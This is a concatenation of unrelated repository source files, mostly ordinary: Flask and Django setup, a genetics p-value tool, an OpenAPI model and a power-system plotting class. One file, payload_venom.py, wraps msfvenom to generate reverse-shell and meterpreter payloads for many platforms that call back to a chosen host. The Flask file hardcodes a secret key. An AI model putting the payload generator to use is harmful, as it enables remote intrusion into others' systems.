[ "Apache-2.0" ]
2
2021-12-20T16:57:41.000Z
2021-12-20T17:00:19.000Z
__init__.py
Ryize/it-news
a77f5ba37d665d902f229e6411145050db93e5c9
[ "Apache-2.0" ]
null
null
null
__init__.py
Ryize/it-news
a77f5ba37d665d902f229e6411145050db93e5c9
[ "Apache-2.0" ]
null
null
null
from flask import Flask, flash, redirect, render_template, request, url_for, session, escape, make_response from flask_sqlalchemy import SQLAlchemy from flask_login import LoginManager, UserMixin from flask_login import login_user, login_required, logout_user from loguru import logger from hashlib import md5 from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText import re import os import smtplib import random import datetime application = Flask(__name__) application.config['SQLALCHEMY_DATABASE_URI'] = os.getenv('db_connector') application.config['SECRET_KEY'] = 'KRp3SWo8W57zUWh8n921ZX61V632j6mo0G1Bv3b829cw4Qz14B08MI2KO6327SlJ' application.config['MAX_CONTENT_LENGTH'] = 1024 * 1024 logger.add('logs/log.txt', format=''' δΞ[{time}] [{level}] {message}''', level='DEBUG', rotation='10 MB', compression='zip') email = os.getenv('email') password = os.getenv('email_password') db = SQLAlchemy(application) manager = LoginManager(application) from models import * from routes import *
32
107
0.801758
795ab0b7666874ff0199b44cef73460aad9dda81
213
py
Python
airzus/urls.py
allenamusin/metadata-verifier
7b2c61c231c49c722d1db9c9e83f157b6e2439f4
[ "MIT" ]
null
null
null
airzus/urls.py
allenamusin/metadata-verifier
7b2c61c231c49c722d1db9c9e83f157b6e2439f4
[ "MIT" ]
11
2020-02-12T03:26:35.000Z
2022-02-10T12:01:00.000Z
airzus/urls.py
allenamusin/metadata-verifier
7b2c61c231c49c722d1db9c9e83f157b6e2439f4
[ "MIT" ]
null
null
null
from django.contrib import admin from django.urls import path, include urlpatterns = [ path('admin/', admin.site.urls), path('accounts/', include('allauth.urls')), path('', include('pages.urls')), ]
23.666667
47
0.666667
795ab33683b1ef997151102034bf0e566cdaa2d3
22,126
py
Python
sstar/cal_pvalue.py
admixVIE/sstar
58db7647612cd6801a3570681e1f5a240d9c7050
[ "Apache-2.0" ]
null
null
null
sstar/cal_pvalue.py
admixVIE/sstar
58db7647612cd6801a3570681e1f5a240d9c7050
[ "Apache-2.0" ]
null
null
null
sstar/cal_pvalue.py
admixVIE/sstar
58db7647612cd6801a3570681e1f5a240d9c7050
[ "Apache-2.0" ]
null
null
null
# Apache License Version 2.0 # Copyright 2022 Xin Huang # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import allel import gzip import os import numpy as np import pandas as pd from multiprocessing import Process, Queue from sstar.utils import read_data, py2round, read_mapped_region_file, cal_match_pct #@profile def cal_pvalue(vcf, ref_ind_file, tgt_ind_file, src_ind_file, anc_allele_file, output, thread, score_file, ref_match_pct_file, mapped_region_file, low_memory, mapped_len_esp, len_esp, var_esp, sfs_esp): """ Description: Calculate p-values for S* haplotypes in the target population with source genomes. Arguments: vcf str: Name of the VCF file containing genotypes. src_vcf str: Name of the VCF file containing genotypes from source populations. ref_ind_file str: Name of the file containing sample information from reference populations. tgt_ind_file str: Name of the file containing sample information from target populations. src_ind_file str: Name of the file containing sample information from source populations. anc_allele_file str: Name of the file containing ancestral allele information. output str: Name of the output file. thread int: Number of threads. score_file str: Name of the file containing S* scores calculated by `s-star score`. ref_match_pct_file str: Names of the files containing match percents in reference populations calculated by `s-star rmatch`. mapped_region_file str: Name of the BED file containing mapped regions. 
mapped_len_esp float: Increment of the length of the mapped region. len_esp float: Increment of the length of the haplotype. var_esp float: Increment of the number of derived alleles on the haplotype. sfs_esp float: Increment of mean site frequency spectrum. """ ref_data, ref_samples, tgt_data, tgt_samples, src_data, src_samples = read_data(vcf, ref_ind_file, tgt_ind_file, src_ind_file, anc_allele_file) res = [] chr_names = ref_data.keys() mapped_intervals = read_mapped_region_file(mapped_region_file) data, windows, samples = _read_score_file(score_file, chr_names, tgt_samples) sample_size = len(samples) header = 'chrom\tstart\tend\tsample\tp-value\t' header += 'src_sample\thap_index\tS*_start\tS*_end\tS*_SNP_num\t' header += "hap_dSNV_num\thap_len\thap_mapped_len\thap_match_num\thap_tot_num\thap_dSNP_per_site_num\thap_S*_match(%)\thap_num_match_ref" # Read match percents in reference populations from a file # Use whole-genome match percents as the null distributions if low_memory: try: ref_match_pct = pd.read_csv(ref_match_pct_file, compression="gzip", sep="\t") except: ref_match_pct = pd.read_csv(ref_match_pct_file, sep="\t") query_ref_match_pct = _query_ref_match_pct_pandas else: ref_match_pct = _read_ref_match_pct_file(ref_match_pct_file) query_ref_match_pct = _query_ref_match_pct_naive #for s in samples[0:1]: # i = samples.index(s) # res = _cal_pvalue_ind(data[s], i, mapped_intervals, tgt_data, src_data, src_samples, ref_match_pct, sample_size, query_ref_match_pct, mapped_len_esp, len_esp, var_esp, sfs_esp) if thread is None: thread = min(os.cpu_count()-1, sample_size) res = _cal_tgt_match_pct_manager(data, mapped_intervals, samples, tgt_samples, src_samples, tgt_data, src_data, ref_match_pct, sample_size, query_ref_match_pct, thread, mapped_len_esp, len_esp, var_esp, sfs_esp) with open(output, 'w') as o: o.write(header+"\n") o.write("\n".join(res)+"\n") #@profile def _read_score_file(score_file, chr_names, tgt_samples): """ Description: Helper function for 
reading the file generated by `sstar score`. Arguments: score_file str: Name of the file containing S* scores generated by `sstar score`. chr_names list: List containing names of chromosomes for analysis. tgt_samples list: List containing names of samples from the target population for analysis. Returns: data dict: Dictionary containing S* for analysis. windows dict: Dictionary containing windows for analysis. header str: Header from the file generated by `sstar score`. samples list: List containing names of samples in the target population for analysis. """ data = dict() windows = dict() for c in chr_names: windows[c] = [] samples = [] with open(score_file, 'r') as f: header = f.readline().rstrip() for line in f.readlines(): line = line.rstrip() elements = line.split("\t") chr_name = elements[0] win_start = elements[1] win_end = elements[2] sample = elements[3] if sample not in tgt_samples: continue if elements[6] == 'NA': continue if sample not in data.keys(): data[sample] = [] samples.append(sample) data[sample].append(line) star_snps = elements[-1].split(",") windows[c].append((int(win_start), int(win_end))) windows[c].append((int(star_snps[0]), int(star_snps[-1]))) return data, windows, samples #@profile def _read_ref_match_pct_file(ref_match_pct_file): """ Description: Helper function for reading match percents from the reference population. Arguments: ref_match_pct_file str: Name of the file containing match percents from the reference population. Returns: ref_match_pct dict: Dictionary containing match percents from the reference population. 
""" f = gzip.open(ref_match_pct_file, 'rt') try: f.readline() except: f.close() f = open(ref_match_pct_file, 'r') f.readline() ref_match_pct = dict() for line in f.readlines(): elements = line.rstrip().split("\t") count = int(elements[0]) mapped_bases_bin = int(elements[1]) hap_len = int(elements[2]) mh_sites = int(elements[3]) tot_sites = int(elements[4]) sfs = float(elements[5]) match = float(elements[6]) if mapped_bases_bin not in ref_match_pct.keys(): ref_match_pct[mapped_bases_bin] = dict() if hap_len not in ref_match_pct[mapped_bases_bin].keys(): ref_match_pct[mapped_bases_bin][hap_len] = dict() if mh_sites not in ref_match_pct[mapped_bases_bin][hap_len].keys(): ref_match_pct[mapped_bases_bin][hap_len][mh_sites] = dict() if sfs not in ref_match_pct[mapped_bases_bin][hap_len][mh_sites].keys(): ref_match_pct[mapped_bases_bin][hap_len][mh_sites][sfs] = dict() ref_match_pct[mapped_bases_bin][hap_len][mh_sites][sfs]['count'] = [] ref_match_pct[mapped_bases_bin][hap_len][mh_sites][sfs]['match_pct'] = [] ref_match_pct[mapped_bases_bin][hap_len][mh_sites][sfs]['count'].append(count) ref_match_pct[mapped_bases_bin][hap_len][mh_sites][sfs]['match_pct'].append(match / tot_sites) f.close() return ref_match_pct def _cal_tgt_match_pct_manager(data, mapped_intervals, samples, tgt_samples, src_samples, tgt_data, src_data, ref_match_pct, sample_size, query_ref_match_pct, thread, mapped_len_esp, len_esp, var_esp, sfs_esp): """ Description: Manager function to calculate match percents in target populations using multiprocessing. Arguments: data dict: Lines from the output file created by `sstar score`. mapped_intervals dict: Dictionary of tuples containing mapped regions across the genome. sample list: Sample information for individuals needed to be estimated match percents. tgt_samples list: Sample information from target populations. src_samples list: Sample information from source populations. tgt_data dict: Genotype data from target populations. 
src_data dict: Genotype data from source populations. ref_match_pct dict: Match percents calculated from reference populations. sample_size int: Number of individuals analyzed. query_ref_match_pct func: Function used to query match percentage from reference populations. thread int: Number of threads. mapped_len_esp float: Increment of the length of the mapped region. len_esp float: Increment of the length of the haplotype. var_esp float: Increment of the number of derived alleles on the haplotype. sfs_esp float: Increment of mean site frequency spectrum. Returns: res list: Match percents for target populations. """ try: from pytest_cov.embed import cleanup_on_sigterm except ImportError: pass else: cleanup_on_sigterm() res = [] in_queue, out_queue = Queue(), Queue() workers = [Process(target=_cal_tgt_match_pct_worker, args=(in_queue, out_queue, mapped_intervals, tgt_data, src_data, src_samples, ref_match_pct, len(tgt_samples), query_ref_match_pct, mapped_len_esp, len_esp, var_esp, sfs_esp)) for ii in range(thread)] for t in samples: index = tgt_samples.index(t) in_queue.put((index, data[t])) try: for worker in workers: worker.start() for s in range(sample_size): item = out_queue.get() if item != '': res.append(item) for worker in workers: worker.terminate() finally: for worker in workers: worker.join() return res def _cal_tgt_match_pct_worker(in_queue, out_queue, mapped_intervals, tgt_data, src_data, src_samples, ref_match_pct, sample_size, query_ref_match_pct, mapped_len_esp, len_esp, var_esp, sfs_esp): """ Description: Worker function to calculate match percents in target populations. Arguments: in_queue multiprocessing.Queue: multiprocessing.Queue instance to receive parameters from the manager. out_queue multiprocessing.Queue: multiprocessing.Queue instance to send results back to the manager. mapped_intervals dict: Dictionary of tuples containing mapped regions across the genome. tgt_data dict: Genotype data from target populations. 
src_data dict: Genotype data from source populations. src_samples list: List containing sample information for source populations. ref_match_pct dict: Match percents in reference populations as the null distribution. sample_size int: Number of individuals analyzed. query_ref_match_pct func: Function used to query match percentages from reference popualtions. mapped_len_esp float: Increment of the length of the mapped region. len_esp float: Increment of the length of the haplotype. var_esp float: Increment of the number of derived alleles on the haplotype. sfs_esp float: Increment of mean site frequency spectrum. """ while True: index, data = in_queue.get() res = _cal_pvalue_ind(data, index, mapped_intervals, tgt_data, src_data, src_samples, ref_match_pct, sample_size, query_ref_match_pct, mapped_len_esp, len_esp, var_esp, sfs_esp) out_queue.put("\n".join(res)) #@profile def _get_ssnps_range(chr_name, data, ind_index, hap_index, win_start, win_end, s_star_snps): """ Description: Helper function to obtain the range of a haplotype containing S* SNPs. If the haplotype contains less than two S* SNPs, it will be ignored. Arguments: chr_name str: Name of the chromosome. data dict: Dictionary containing genotype data and position information. ind_index int: Index of the individual carrying S* SNPs. hap_index int: Index of the haplotype carrying S* SNPs. win_start int: Start position of the local window containing S* SNPs. wind_end int: End position of the local window containing S* SNPs. s_star_snps list: List containing positions of S* SNPs. Returns: hap_pos_min int: Start position of the haplotype. hap_pos_max int: End position of the haplotype. 
""" gt = data[chr_name]['GT'] pos = data[chr_name]['POS'] sub_snps = np.where((pos>=win_start) & (pos<=win_end))[0] sub_gt = gt[sub_snps][:,ind_index] sub_pos = pos[sub_snps] hap = sub_gt[:,hap_index] s_star_snps_pos = [int(s) for s in s_star_snps] index = np.in1d(sub_pos, s_star_snps_pos) hap_num = np.sum(hap[index]) if hap_num < 2: hap_pos_max = 'NA' hap_pos_min = 'NA' else: hap_pos_max = int(np.array(s_star_snps_pos)[np.equal(hap[index],1)][-1]) hap_pos_min = int(np.array(s_star_snps_pos)[np.equal(hap[index],1)][0]) return hap_pos_min, hap_pos_max, hap_num #@profile def _query_ref_match_pct_naive(ref_match_pct, hap_stats, mapped_len_esp, len_esp, var_esp, sfs_esp): """ Description: Helper function for querying match percents from the reference population consistent with statistics from a given haplotype using Python dictionary. Arguments: ref_match_pct dict: Dictionary containing match percents from the reference population. hap_stats list: List containing statistics from a haplotype. mapped_len_esp float: Increment of the length of the mapped region. len_esp float: Increment of the length of the haplotype. var_esp float: Increment of the number of derived alleles on the haplotype. sfs_esp float: Increment of mean site frequency spectrum. Returns: res list: List containing match percents from the reference population. 
""" res = [] mapped_len = hap_stats[2] hap_len = hap_stats[1] hap_site = hap_stats[-3] hap_var = hap_stats[0] sfs = hap_stats[-2] if (mapped_len == 'NA') or (hap_len == 'NA') or (hap_var == 'NA') or (sfs == 'NA'): return res mapped_len_start = mapped_len - mapped_len_esp mapped_len_end = mapped_len + mapped_len_esp len_start = hap_len - len_esp len_end = hap_len + len_esp var_start = hap_var - var_esp var_end = hap_var + var_esp sfs_start = sfs - sfs_esp sfs_end = sfs + sfs_esp for mapped_len in ref_match_pct.keys(): if (mapped_len >= mapped_len_start) and (mapped_len <= mapped_len_end): for hap_len in ref_match_pct[mapped_len].keys(): if (hap_len >= len_start) and (hap_len <= len_end): for hap_var in ref_match_pct[mapped_len][hap_len].keys(): if (hap_var >= var_start) and (hap_var <= var_end): for sfs in ref_match_pct[mapped_len][hap_len][hap_var].keys(): if (sfs >= sfs_start) and (sfs <= sfs_end): for e in zip(ref_match_pct[mapped_len][hap_len][hap_var][sfs]['match_pct'], ref_match_pct[mapped_len][hap_len][hap_var][sfs]['count']): res += [e[0]] * e[1] return res #@profile def _query_ref_match_pct_pandas(df, hap_stats, mapped_len_esp, len_esp, var_esp, sfs_esp): """ Description: Helper function for querying match percents from the reference population consistent with statistics from a given haplotype using the polars package. Arguments: ref_match_pct dict: Dictionary containing match percents from the reference population. hap_stats list: List containing statistics from a haplotype. mapped_len_esp float: Increment of the length of the mapped region. len_esp float: Increment of the length of the haplotype. var_esp float: Increment of the number of derived alleles on the haplotype. sfs_esp float: Increment of mean site frequency spectrum. Returns: res list: List containing match percents from the reference population. 
""" res = [] mapped_len = hap_stats[2] hap_len = hap_stats[1] hap_site = hap_stats[-3] hap_var = hap_stats[0] sfs = hap_stats[-2] if (mapped_len == 'NA') or (hap_len == 'NA') or (hap_var == 'NA') or (sfs == 'NA'): return res mapped_len_start = mapped_len - mapped_len_esp mapped_len_end = mapped_len + mapped_len_esp len_start = hap_len - len_esp len_end = hap_len + len_esp var_start = hap_var - var_esp var_end = hap_var + var_esp sfs_start = sfs - sfs_esp sfs_end = sfs + sfs_esp counts = df[(df['hap_len'] >= len_start) & (df['hap_len'] <= len_end) & (df['hap_mapped_len_bin'] >= mapped_len_start) & (df['hap_mapped_len_bin'] <= mapped_len_end) & (df['hap_match_num'] >= var_start)& (df['hap_match_num'] <= var_end) & (df['hap_dSNP_per_site_num'] >= sfs_start) & (df['hap_dSNP_per_site_num'] <= sfs_end)] matches = counts['match_pct'].values counts = counts['count'].values for i in range(len(counts)): res += [matches[i]] * counts[i] return res #@profile def _cal_pvalue(ref_match_pct, hap_match_pct): """ Description: Helper function to calculate a p-value for a given match percent. Arguments: ref_match_pct list: Match percents from reference populations as the null distribution. hap_match_pct float: Match percent of a haplotype in a window. Returns: pvalue float: P-value for the significance of the match percent. """ if (ref_match_pct is None) or (len(ref_match_pct) == 0): return 'NA' if hap_match_pct == 0: return 1.0 if hap_match_pct == 'NA': return 'NA' count = len([r for r in ref_match_pct if hap_match_pct <= round(r, 6)]) pvalue = count / len(ref_match_pct) pvalue = round(pvalue, 6) return pvalue #@profile def _cal_pvalue_ind(data, tgt_ind_index, mapped_intervals, tgt_data, src_data, src_samples, ref_match_pct, sample_size, query_ref_match_pct, mapped_len_esp, len_esp, var_esp, sfs_esp): """ Description: Helper function for calculating p-values in individuals. Arguments: data dict: Dictionary containing S* for analysis. 
tgt_ind_index int: Index of the target individual for analysis. mapped_intervals dict: Dictionary of tuples containing mapped regions across the genome. tgt_data dict: Genotype data from target populations. src_data dict: Genotype data from source populations. src_samples list: List of samples from source populations. ref_match_pct dict: Dictionary containing match percents from the reference population. sample_size int: Number of individuals analyzed. query_ref_match_pct func: Function used to query match percentages from reference popualtions. mapped_len_esp float: Increment of the length of the mapped region. len_esp float: Increment of the length of the haplotype. var_esp float: Increment of the number of derived alleles on the haplotype. sfs_esp float: Increment of mean site frequency spectrum. Returns: res list: List containing estimated p-values and other statistics. """ res = [] for line in data: elements = line.split("\t") chr_name = elements[0] win_start, win_end = elements[1], elements[2] sample = elements[3] s_star_snps = elements[-1].split(",") s_start, s_end = s_star_snps[0], s_star_snps[-1] key1 = win_start+'-'+win_end key2 = s_start+'-'+s_end for src_ind_index in range(len(src_samples)): # Results using SNPs within S* SNPs src_sample = src_samples[src_ind_index] hap1_s_start, hap1_s_end, hap1_s_num = _get_ssnps_range(chr_name, tgt_data, tgt_ind_index, 0, int(win_start), int(win_end), s_star_snps) hap2_s_start, hap2_s_end, hap2_s_num = _get_ssnps_range(chr_name, tgt_data, tgt_ind_index, 1, int(win_start), int(win_end), s_star_snps) hap1_star_res = cal_match_pct(chr_name, mapped_intervals, tgt_data, src_data, tgt_ind_index, src_ind_index, 0, hap1_s_start, hap1_s_end, sample_size) hap2_star_res = cal_match_pct(chr_name, mapped_intervals, tgt_data, src_data, tgt_ind_index, src_ind_index, 1, hap2_s_start, hap2_s_end, sample_size) hap1_star_match_pct = hap1_star_res[-1] hap2_star_match_pct = hap2_star_res[-1] ref_match_pct3 = 
query_ref_match_pct(ref_match_pct, hap1_star_res, mapped_len_esp, len_esp, var_esp, sfs_esp) ref_match_pct4 = query_ref_match_pct(ref_match_pct, hap2_star_res, mapped_len_esp, len_esp, var_esp, sfs_esp) hap1_star_match_pvalue = _cal_pvalue(ref_match_pct3, hap1_star_match_pct) hap2_star_match_pvalue = _cal_pvalue(ref_match_pct4, hap2_star_match_pct) hap1_num_match_ref = 'NA' hap2_num_match_ref = 'NA' if ref_match_pct3 is not None: hap1_num_match_ref = len(ref_match_pct3) if ref_match_pct4 is not None: hap2_num_match_ref = len(ref_match_pct4) line1 = f'{chr_name}\t{win_start}\t{win_end}\t{sample}\t{hap1_star_match_pvalue}\t' line1 += f'{src_sample}\t1\t{hap1_s_start}\t{hap1_s_end}\t{hap1_s_num}\t' line1 += "\t".join([str(r) for r in hap1_star_res]) + f"\t{hap1_num_match_ref}" line2 = f'{chr_name}\t{win_start}\t{win_end}\t{sample}\t{hap2_star_match_pvalue}\t' line2 += f'{src_sample}\t2\t{hap2_s_start}\t{hap2_s_end}\t{hap2_s_num}\t' line2 += "\t".join([str(r) for r in hap2_star_res]) + f"\t{hap2_num_match_ref}" res.append(line1) res.append(line2) return res
45.904564
329
0.688963
795ab3cd1e8b3e197c0f3913cce9aa11b2269378
183
py
Python
toys/urls.py
Zoki92/DRF-toys
e0f59f5fecd94035eb0dc68dbd1e9e4591b344dc
[ "MIT" ]
null
null
null
toys/urls.py
Zoki92/DRF-toys
e0f59f5fecd94035eb0dc68dbd1e9e4591b344dc
[ "MIT" ]
null
null
null
toys/urls.py
Zoki92/DRF-toys
e0f59f5fecd94035eb0dc68dbd1e9e4591b344dc
[ "MIT" ]
null
null
null
from django.urls import path from . import views urlpatterns = [ path('toys/', views.toy_list, name="toy_list"), path('toys/<int:pk>', views.toy_detail, name="toy_detail") ]
22.875
62
0.68306
795ab4c1cd6f5c2176a3699585b063847054041a
1,624
py
Python
openapi_core/schema/media_types/models.py
badcure/openapi-core
d369076bd135146c131cf0c92dab77f60d2571a5
[ "BSD-3-Clause" ]
null
null
null
openapi_core/schema/media_types/models.py
badcure/openapi-core
d369076bd135146c131cf0c92dab77f60d2571a5
[ "BSD-3-Clause" ]
null
null
null
openapi_core/schema/media_types/models.py
badcure/openapi-core
d369076bd135146c131cf0c92dab77f60d2571a5
[ "BSD-3-Clause" ]
null
null
null
"""OpenAPI core media types models module""" from collections import defaultdict from json import loads from openapi_core.schema.media_types.exceptions import InvalidMediaTypeValue from openapi_core.schema.schemas.exceptions import OpenAPISchemaError MEDIA_TYPE_DESERIALIZERS = { 'application/json': loads, } class MediaType(object): """Represents an OpenAPI MediaType.""" def __init__(self, mimetype, schema=None, example=None): self.mimetype = mimetype self.schema = schema self.example = example def get_deserializer_mapping(self): mapping = MEDIA_TYPE_DESERIALIZERS.copy() return defaultdict(lambda: lambda x: x, mapping) def get_dererializer(self): mapping = self.get_deserializer_mapping() return mapping[self.mimetype] def deserialize(self, value): deserializer = self.get_dererializer() return deserializer(value) def unmarshal(self, value, custom_formatters=None, read=False, write=False): if not self.schema: return value try: deserialized = self.deserialize(value) except ValueError as exc: raise InvalidMediaTypeValue(exc) try: unmarshalled = self.schema.unmarshal(deserialized, custom_formatters=custom_formatters) except OpenAPISchemaError as exc: raise InvalidMediaTypeValue(exc) try: return self.schema.validate(unmarshalled, custom_formatters=custom_formatters, read=read, write=write) except OpenAPISchemaError as exc: raise InvalidMediaTypeValue(exc)
30.641509
114
0.696429
795ab522e57fb2bcd9651e2a561bd85697d937b8
2,011
py
Python
src/payload_venom.py
darkracer3010/Networcked
8b7ce0d465e6818dc08f57e643b0cef43f314c0f
[ "MIT" ]
1
2022-02-25T09:03:06.000Z
2022-02-25T09:03:06.000Z
src/payload_venom.py
darkracer3010/Networcked
8b7ce0d465e6818dc08f57e643b0cef43f314c0f
[ "MIT" ]
1
2021-11-27T06:52:46.000Z
2021-11-27T06:52:46.000Z
src/payload_venom.py
darkracer3010/Networcked
8b7ce0d465e6818dc08f57e643b0cef43f314c0f
[ "MIT" ]
4
2021-11-27T06:45:24.000Z
2022-02-25T09:03:08.000Z
import os from subprocess import PIPE, run import time def command(cmd): return run(cmd, stdout=PIPE, stderr=PIPE, universal_newlines=True, shell=True) payloads={ "linux":"msfvenom -p linux/x86/meterpreter/reverse_tcp", "windows": "msfvenom -p windows/meterpreter/reverse_tcp ", "mac":"msfvenom -p osx/x86/shell_reverse_tcp LHOST=ip_address ", "php" : "msfvenom -p php/meterpreter_reverse_tcp ", "asp" : "msfvenom -p windows/meterpreter/reverse_tcp ", "jsp" : "msfvenom -p java/jsp_shell_reverse_tcp ", "war" : "msfvenom -p java/jsp_shell_reverse_tcp ", "python" : "msfvenom -p cmd/unix/reverse_python ", "bash" : "msfvenom -p cmd/unix/reverse_bash ", "perl" : "msfvenom -p cmd/unix/reverse_perl ", } extentions={ "linux" : " -f elf > shell.elf", "windows" : " -f exe > shell.exe", "mac" : " -f macho > shell.macho", "php" : " -f raw > shell.php", "asp" : " -f asp > shell.asp", "jsp" : " -f raw > shell.jsp", "war" : " -f war > shell.war", "python" : " -f raw > shell.py", "bash" : " -f raw > shell.sh", "perl" : " -f raw > shell.pl", } def payloads_msf(a): #netw --payload linux/python/etc lhost lport a=a.split() if "netw" in a: if "--payload" in a: RED='\033[0;31m' NC='\033[0m' green='\033[0;32m' cyan='\033[0;36m' orange='\033[0;33m' purple='\033[0;35m' print() os.system("echo '\033[0;31m [Starting] \033[0m Loading The Modules...'") print() time.sleep(1) os.system("echo '\033[0;31m [Initializing] \033[0m Starting The Payload...'") time.sleep(1) print() os.system("echo '\033[0;31m [Retrieving the Data] \033[0m Almost there.....'") print() time.sleep(1) os.system("echo '\033[0;32m [Got The Info !!] \033'") print() try: data=payloads[a[2]] host=" LHOST="+str(a[3]) port=" LPORT="+str(a[4]) print(data+host+port+extentions[a[2]]) command(data+host+port+extentions[a[2]]) except: print("Module Not Found!\n") # a=input("Enter Your Command: ").split() # payloads_msf(a)
27.930556
83
0.622079
795ab563a1b7b0c6da4a6361c293b5ee79ccbc9b
6,342
py
Python
PyDSS/pyPlots/Plots/Table.py
dvaidhyn/PyDSS
0d220d00900da4945e2ab6e7774de5edb58b36a9
[ "BSD-3-Clause" ]
21
2019-02-04T22:19:50.000Z
2022-03-01T18:06:28.000Z
PyDSS/pyPlots/Plots/Table.py
dvaidhyn/PyDSS
0d220d00900da4945e2ab6e7774de5edb58b36a9
[ "BSD-3-Clause" ]
33
2020-01-28T22:47:44.000Z
2022-03-30T20:05:00.000Z
PyDSS/pyPlots/Plots/Table.py
dvaidhyn/PyDSS
0d220d00900da4945e2ab6e7774de5edb58b36a9
[ "BSD-3-Clause" ]
11
2019-12-28T01:04:55.000Z
2022-03-01T18:05:30.000Z
from PyDSS.pyPlots.pyPlotAbstract import PlotAbstract from bokeh.plotting import figure, curdoc from bokeh.io import output_file from bokeh.models import ColumnDataSource, ColorBar, \ LinearColorMapper, HoverTool, BoxSelectTool, BoxZoomTool, \ PanTool, WheelZoomTool, ResetTool, SaveTool, Label from bokeh.palettes import Plasma from bokeh.client import push_session import pandas as pd import numpy as np class Table(PlotAbstract): def __init__(self,PlotProperties, dssBuses, dssObjects, dssCircuit, dssSolver): super(Table).__init__() self.__dssBuses = dssBuses self.__dssObjs = dssObjects self.__dssCircuit = dssCircuit self.__PlotProperties = PlotProperties self.xMul = PlotProperties['xScaler'] self.yMul = PlotProperties['yScaler'] self.cMul = PlotProperties['cScaler'] self.xInd = PlotProperties['xindex'] self.yInd = PlotProperties['yindex'] self.cInd = PlotProperties['cindex'] self.xObj = self.getObject(PlotProperties['xObjName'],PlotProperties['xObjectType']) self.yObj = self.getObject(PlotProperties['yObjName'],PlotProperties['yObjectType']) self.cObj = self.getObject(PlotProperties['cObjName'],PlotProperties['cObjectType']) output_file(PlotProperties['FileName']) xVal = self.getObjectValue(self.xObj, PlotProperties['xObjectType'], PlotProperties['xProperty'], self.xInd, self.xMul) yVal = self.getObjectValue(self.yObj, PlotProperties['yObjectType'], PlotProperties['yProperty'], self.yInd, self.yMul) cVal = self.getObjectValue(self.cObj, PlotProperties['cObjectType'], PlotProperties['cProperty'], self.cInd, self.cMul) self.xVals = [xVal] self.yVals = [yVal] self.cVals = [cVal] Data = pd.DataFrame(np.transpose([self.xVals, self.yVals, self.cVals]), columns=['X', 'Y', 'C']) ColorArray = self.GetColorArray(Data['C'].astype(float), Plasma[256]) self.__Figure = figure(plot_width=self.__PlotProperties['Width'], plot_height=self.__PlotProperties['Height'], title= 'XY Plot: Color - ' + PlotProperties['cObjName'] + ' - ' + PlotProperties['cProperty']) self.ScatterPlot = 
self.__Figure.scatter(x= Data['X'], y=Data['Y'], fill_color=Plasma[256][1], fill_alpha=0.6, line_color=None, size=7) self.__Figure.yaxis.axis_label = PlotProperties['yObjName'] + ' - ' + PlotProperties['yProperty'] self.__Figure.xaxis.axis_label = PlotProperties['xObjName'] + ' - ' + PlotProperties['xProperty'] self.doc = curdoc() self.doc.add_root(self.__Figure) self.doc.title = "PyDSS" self.session = push_session(self.doc) #self.session.show(self.__Figure) # open the document in a browser return def GetSessionID(self): return self.session.id def GetColorArray(self, DataSeries, Pallete): if len(DataSeries)> 10: nBins = len(Pallete) minVal = min(DataSeries) maxVal = max(DataSeries) bins = np.arange(minVal, maxVal, (maxVal-minVal)/(nBins+1)) nBinEdges = len(bins) if nBinEdges - nBins > 1: bins = bins[:nBins+1] ColorArray = pd.cut(DataSeries, bins, labels=Pallete) ColorArray = ColorArray.replace(np.nan, Pallete[-1], regex=True) ColorArray = ColorArray.tolist() else: ColorArray = Pallete[0] return ColorArray def getObjectValue(self, Obj, ObjType, ObjPpty, Index, Multiplier): pptyType, Property = ObjPpty.split('.') if pptyType == 'p': pptyValue = float(Obj.GetParameter(Property)) elif pptyType == 'v' and ObjType != 'Circuit': pptyValue = Obj.GetVariable(Property) elif pptyType == 'v' and ObjType == 'Circuit': pptyValue = getattr(Obj, Property)() if pptyValue is not None: if isinstance(pptyValue, list): if Index.lower() == 'sumeven': result = Multiplier * sum(pptyValue[::2]) elif Index.lower() == 'sumodd': result = Multiplier * sum(pptyValue[1::2]) elif Index.lower() == 'even': result = [[Multiplier * x] for x in pptyValue[::2]] elif Index.lower() == 'odd': result = [[Multiplier * x] for x in pptyValue[1::2]] elif 'Index=' in Index: c = int(Index.replace('Index=', '')) result = Multiplier * pptyValue[c] else: result = Multiplier * pptyValue return result def getObject(self, ObjName, ObjType): if ObjType == 'Element': Obj = self.__dssObjs[ObjName] elif ObjType == 'Bus': 
Obj = self.__dssBuses[ObjName] elif ObjType == 'Circuit': Obj = self.__dssCircuit else: Obj = None return Obj def UpdatePlot(self): xVal = self.getObjectValue(self.xObj, self.__PlotProperties['xObjectType'], self.__PlotProperties['xProperty'], self.xInd, self.xMul) yVal = self.getObjectValue(self.yObj, self.__PlotProperties['yObjectType'], self.__PlotProperties['yProperty'], self.yInd, self.yMul) cVal = self.getObjectValue(self.cObj, self.__PlotProperties['cObjectType'], self.__PlotProperties['cProperty'], self.cInd, self.cMul) self.xVals.append(xVal) self.yVals.append(yVal) self.cVals.append(cVal) Data = pd.DataFrame(np.transpose([self.xVals, self.yVals, self.cVals]), columns=['X', 'Y', 'C']) Data = Data.sort_values('X') Data = Data.drop_duplicates(subset=Data.columns) #ColorArray = self.GetColorArray(Data['X'].astype(float), Plasma[256]) self.ScatterPlot.data_source.data['x'] = Data['X'] self.ScatterPlot.data_source.data['y'] = Data['Y'] #self.ScatterPlot
42.851351
119
0.589089
795ab614a18a26e54d9f13a67016cc1b5f90f94d
1,066
py
Python
setup.py
arita37/fast-bert
f07782873031db440e60b2c55d5a9dbab53e01a9
[ "Apache-2.0" ]
1
2019-10-08T03:01:04.000Z
2019-10-08T03:01:04.000Z
setup.py
alberduris/fast-bert
f07782873031db440e60b2c55d5a9dbab53e01a9
[ "Apache-2.0" ]
null
null
null
setup.py
alberduris/fast-bert
f07782873031db440e60b2c55d5a9dbab53e01a9
[ "Apache-2.0" ]
null
null
null
